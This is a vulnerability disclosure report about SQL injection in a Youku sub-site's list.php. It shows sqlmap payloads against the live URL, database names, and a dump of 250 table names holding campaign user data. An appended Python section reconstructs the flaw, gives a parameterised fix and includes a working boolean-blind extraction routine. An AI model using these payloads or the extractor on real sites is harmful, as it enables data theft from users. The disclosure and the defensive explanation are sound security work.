
SQL injection on a Youku sub-site

2015-01-02 08:20

Code block:
http://hvsop.youku.com/list.php?music=1



[Screenshot: 09.jpg]





Code block:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: music
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: music=1' AND 7821=7821 AND 'IbzW'='IbzW

    Type: UNION query
    Title: MySQL UNION query (NULL) - 15 columns
    Payload: music=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178686571,0x496c4e6172726d6c4b7a,0x7166706a71),NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: music=1' AND SLEEP(5) AND 'fKmP'='fKmP
---
[22:00:42] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.3.10
back-end DBMS: MySQL 5.0.11
[22:00:42] [INFO] fetching database names
available databases [3]:
[*] db_events
[*] information_schema
[*] test

[22:00:42] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\output\hvsop.youku.com'

Proof of vulnerability:

Code block:
Database: db_events
[250 tables]
+--------------------------+
| 7up_user |
| adidas_2010_football |
| adidas_2011_tvc_info |
| adidas_comments |
| aveo_clicks |
| aveo_comments |
| aveo_users |
| background_users |
| bosideng_1024_users |
| bosideng_code |
| bosideng_fake_users |
| bosideng_photos |
| bosideng_users |
| bosideng_video_vote_logs |
| bosideng_videos |
| bosideng_vote_logs |
| bsd_kpi_email |
| bsd_kpi_user |
| bsd_rt_log |
| bsd_user |
| bugles_videos |
| casesharing_2013 |
| cgirl2014_awards |
| cgirl_images |
| cgirl_users |
| cgirl_videos |
| chengxin_news |
| chery_comments |
| chery_photo_vote_logs |
| chery_photos |
| chery_users |
| chery_video_vote_logs |
| chery_videos |
| cityshow_comment |
| cityshow_data |
| cityshow_member |
| clear_game_log |
| clear_log |
| clear_rt_log |
| clear_users |
| crowneplaza_register |
| cruze_images |
| cruze_users |
| cruze_videos |
| deyi_tickets_users |
| dove2014_erweima |
| dove2014_videos |
| dove_user |
| dove_video |
| dumex_videos |
| etam_comment |
| etam_txt |
| fiesta_2011_guestbook |
| fm_dream |
| fm_kpi_member |
| fm_number |
| fm_number_bak |
| fm_number_t |
| fm_number_test |
| fm_support_log |
| fm_user |
| fm_vote_log |
| fm_work |
| ford_users |
| global_accounts |
| global_china |
| global_files |
| global_minisites |
| global_testing |
| global_units |
| greetingcard_params |
| gucci_comments |
| gucci_rt_logs |
| gucci_users |
| hkdl_users |
| ht_config |
| ht_guest |
| ht_user |
| htc_config |
| hvsop2013_awards |
| hvsop2014_20 |
| hvsop2014_users |
| hvsop_comments |
| hvsop_live_email |
| hvsop_resumes |
| hvsop_users |
| hvsop_videos |
| hvsop_vote_logs |
| icedew_videos |
| jasmine_comments |
| jw2ask_marked |
| jw2ask_plans |
| jw2ask_questions |
| jw2ask_same_q |
| jw2ask_top30_grade_logs |
| kohler_comments |
| kohler_mm_awards |
| kohler_photo_vote_logs |
| kohler_photos |
| kohler_prize_logs |
| kohler_users |
| kohler_video_vote_logs |
| kohler_videos |
| lancome_datas |
| lancome_infos |
| lancome_users |
| lee_moment_photos |
| lee_moment_votelog |
| levis_data |
| levis_logs |
| levis_win |
| loreal_flash_ad |
| mabelline_users |
| mamonde_2013_videos |
| market_huanzhu_votes |
| marketing_apply_info |
| marketing_darenxiu |
| marketing_fashion |
| marketing_jianjiancao |
| marketing_kfc_avatar |
| marketing_kfc_cms |
| marketing_laifushi |
| marketing_upload_info |
| mmd_datas |
| mql_award |
| mql_seckill |
| mql_seckill_bak |
| mql_seckill_log |
| nfsq_users |
| nikegz_comments |
| nikegz_image |
| nikegz_pks |
| nikegz_videos |
| nivea_answer_logs |
| nivea_awards |
| nivea_final_awards |
| nivea_photos |
| nivea_question |
| nivea_users |
| nivea_vote_logs |
| onstar_regist |
| onstar_video |
| oreo_images |
| oreo_videos |
| pepsi_comments |
| pepsi_ecards |
| pepsi_media |
| pepsi_users |
| pepsi_videos |
| pepsi_vote_logs |
| pepsicny_videos |
| qingyang_comment |
| qingyang_videos |
| remyvsop_banner |
| remyvsop_comment |
| remyvsop_mobile |
| remyvsop_news |
| remyvsop_register |
| remyvsop_teams |
| remyvsop_videos |
| ricola_pincode |
| ricola_tickets |
| roewe_comment |
| roewe_config |
| roewe_guess |
| roewe_player |
| roewe_user |
| scj_users |
| sprite_users |
| sprite_videos |
| superb_comments |
| superb_comments_bak |
| superb_videos |
| sww_2011_users |
| sww_2011_videos |
| unit_cachedata |
| unit_comments |
| unit_misc |
| unit_news |
| unit_users |
| unit_videos |
| unit_visitors |
| unit_voting |
| vichy2013_awards |
| vichy2013_winners |
| vsop_email |
| vsop_live_mobile |
| vsop_loop_videos |
| vsop_lyp |
| vsop_users |
| vsop_videos |
| vsop_vote_email |
| wtcc_2011_guestbook |
| wtcc_2011_shots |
| wtcc_2011_users |
| wzmt_awards |
| wzmt_awards_bak |
| wzmt_seckill |
| wzmt_seckill_log |
| z_acer_user |
| z_bwnzb_user |
| z_eleven_user |
| z_fanta |
| z_fanta_email |
| z_ferrari |
| z_ferrero_user |
| z_huggies |
| z_huggies_comments |
| z_k3 |
| z_k3_user |
| z_k3_v |
| z_lenscrafter_pic |
| z_lenscrafter_user |
| z_loreal |
| z_market_disney |
| z_market_topchef |
| z_proya2011_100 |
| z_proya2011_code |
| z_proya2011_mblog |
| z_proya2011_pic |
| z_proya2011_user |
| z_proya2011_v2_pic |
| z_proya2011_v2_user |
| z_proya_pic |
| z_proya_user |
| z_remyclub_comment |
| z_remyclub_user |
| z_riich_user |
| z_sdeer_user |
| z_sepb_user |
| z_sgm15th |
| z_volvo |
| z_wp_code |
| z_young |
| z_z_comment |
| z_z_contact |
| z_z_contact2 |
| z_z_email |
| z_z_img |
| z_z_luck |
| z_z_module_luck |
| z_z_p |
| z_z_txt |
| z_z_txt_vote |
| z_z_v |
| z_z_vote |
| z_z_vote_id |
| z_z_vote_ip |
| zhijue_users |
| zqbb_videos |
+--------------------------+

Remediation:

I only ran it as far as the table list and did not go any further; please fix it, thanks~ I haven't had any rank for days, could I get some?
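The sqlmap output above shows three things at once: a string literal closed by the quote in `music=1'`, a boolean-based blind point (the page for `1' AND 7821=7821 AND 'IbzW'='IbzW` matches the normal `music=1` page, while a false condition gives a different page), and the fact that the same point is enough to pull database, table and column names one character at a time. The report never shows the source of `list.php`, so the following is an added example, not code from the page or from Youku: a hypothetical reconstruction of the vulnerable query beside its parameterised fix, plus a small boolean-based blind extractor in the shape of sqlmap's payload. It uses Python's built-in `sqlite3` as a stand-in for MySQL, so the MySQL-only `SLEEP(5)` time-based payload and the `#` comment from the UNION payload are not reproduced, and `sqlite_master` plays the role of `information_schema.tables`. The table data is constructed; only two table names from the dump are reused.

```python
import sqlite3


def build_db():
    """Constructed in-memory stand-in for db_events (assumption: the real
    schema is unknown, rows are made up, two table names come from the dump)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE hvsop_videos (id INTEGER, music TEXT, title TEXT);
        INSERT INTO hvsop_videos VALUES
            (1, '1', 'clip one'), (2, '1', 'clip two'), (3, '2', 'other clip');
        CREATE TABLE hvsop_users (id INTEGER, name TEXT, email TEXT);
        INSERT INTO hvsop_users VALUES (1, 'alice', 'alice@example.invalid');
    """)
    return con


def vulnerable_list(con, music):
    """Hypothetical reconstruction of list.php: the GET parameter is pasted
    into the SQL text, so a single quote in it terminates the string literal
    and everything after it is parsed as SQL."""
    sql = f"SELECT id, title FROM hvsop_videos WHERE music = '{music}'"
    return con.execute(sql).fetchall()


def safe_list(con, music):
    """Hardened form: a bound parameter is always data, never SQL, so the same
    payload simply matches no row."""
    sql = "SELECT id, title FROM hvsop_videos WHERE music = ?"
    return con.execute(sql, (music,)).fetchall()


def oracle(con, condition):
    """Boolean-based blind oracle in the shape of sqlmap's payload
    music=1' AND 7821=7821 AND 'IbzW'='IbzW : the response equals the
    plain music=1 response exactly when the injected condition is true."""
    payload = f"1' AND ({condition}) AND 'IbzW'='IbzW"
    return vulnerable_list(con, payload) == vulnerable_list(con, "1")


def extract_string(con, scalar_subquery, max_len=64):
    """Recover the value of a scalar subquery one character at a time with a
    binary search over printable ASCII (about 7 oracle calls per character),
    which is how a blind point yields names from the schema tables."""
    out = ""
    for pos in range(1, max_len + 1):
        # Stop once the position is past the end of the string.
        if not oracle(con, f"length(({scalar_subquery})) >= {pos}"):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(con, f"unicode(substr(({scalar_subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


# sqlite_master here stands in for information_schema.tables on MySQL.
TABLE_NAME_QUERY = ("SELECT name FROM sqlite_master WHERE type = 'table' "
                    "AND name LIKE 'hvsop_u%'")

if __name__ == "__main__":
    db = build_db()
    true_payload = "1' AND 7821=7821 AND 'IbzW'='IbzW"
    false_payload = "1' AND 7821=7822 AND 'IbzW'='IbzW"
    print("vulnerable, true condition :", vulnerable_list(db, true_payload))
    print("vulnerable, false condition:", vulnerable_list(db, false_payload))
    print("parameterised, same payload:", safe_list(db, true_payload))
    print("blind-extracted table name :", extract_string(db, TABLE_NAME_QUERY))
```

The fix is the one a report like this is really asking for: bind `music` as a parameter (in the PHP 5.3 stack the page identifies, `mysqli` or PDO prepared statements), and do not rely on escaping the quote, since the UNION payload shows the attacker already controls the whole tail of the statement once the literal is closed.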

Source: www.wooyun.org/bugs/wooyun-2015-083661

Views: 102221 | Comments: 0 | Tags: injection
